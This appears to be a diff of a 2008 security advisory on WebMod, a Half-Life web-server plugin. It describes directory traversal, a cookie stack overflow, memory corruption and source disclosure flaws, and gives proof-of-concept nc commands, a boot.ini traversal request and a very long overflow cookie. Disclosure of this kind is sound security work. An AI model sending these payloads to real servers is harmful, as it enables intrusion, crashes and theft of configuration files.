AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0 - - nc SERVER PORT -v -v < webmodz4.txt - -GET /auth.w. HTTP/1.0 - - -####################################################################### - -====== -4) Fix -====== - - -No fix - - -####################################################################### - -# milw0rm.com [2008-05-03] +####################################################################### + + Luigi Auriemma + +Application: WebMod + http://www.djeyl.net/w.php +Versions: <= 0.48 +Platforms: Windows and Linux +Bugs: A] directory traversal + B] Cookie buffer-overflow + C] parser.cpp arbitrary memory writing + D] scripts source disclosure +Exploitation: remote +Date: 03 May 2008 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + + +####################################################################### + + +1) Introduction +2) Bugs +3) The Code +4) Fix + + +####################################################################### + +=============== +1) Introduction +=============== + + +WebMod is an open source MetaMod plugin which acts as a web server for +Half-Life running on the equivalent TCP port of the UDP one used by the +game. + + +####################################################################### + +======= +2) Bugs +======= + +---------------------- +A] directory traversal +---------------------- + +WebMod uses an anti-directory traversal check which searchs for any +"../" pattern in the HTTP request of the client. +So it's enough to use a "..\" pattern to bypass the check and being +able to download any file from the disk where Half-Life is running +included the configuration files of the game server (like +..\..\..\..\platform\config\server.vdf or ..\..\..\server.cfg). +Note that this bug works only on Windows servers. + +>From server.cpp: + +void clientHandle(int connfd, httpquery_t *query, int tid) + ... + if(strstr(str,"../")) // hack attempt, display index page + { + str[0]='\0'; + } + + +------------------------- +B] Cookie buffer-overflow +------------------------- + +A cookie parameter longer than MYSOCK_BUFLEN (8192) bytes leads to a +stack based buffer-overflow. + +>From server.cpp: + +void connectHandle(void *data) +{ +char *input; +char buf[MYSOCK_BUFLEN+1]; + ... + for(j=0;input[i]&&input[i]!=';'&&input[i]!='\n';j++,i++) + buf[j]=input[i]; + + +-------------------------------------- +C] parser.cpp arbitrary memory writing +-------------------------------------- + +The functions in parser.cpp are affected by some memory corruption +vulnerabilities with different effects depending by the type of +variable/script used. +In short a value longer than MAX_FILE_SIZE (16384) bytes can lead to +the writing of custom data in a custom memory address through strcat +(auth.w?mode) or a NULL pointer (auth.w?redir) or an invalid memory +access (the rconpass parameter of auth.w) and so on. + + +---------------------------- +D] scripts source disclosure +---------------------------- + +Adding a dot at the end of the requested URI allows the viewing of the +script source code instead of executing it. +This bug (which should work only on FAT/NTFS filesystems) can be +considered a security vulnerability ONLY if the server runs custom +scripts. + + +####################################################################### + +=========== +3) The Code +=========== + + +http://aluigi.org/poc/webmodz.zip + + nc SERVER PORT -v -v < webmodz1.txt + +GET /..\..\..\..\..\..\boot.ini HTTP/1.0 + + nc SERVER PORT -v -v < webmodz2.txt + +GET /config.w HTTP/1.0 + +Cookie: rconpass=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA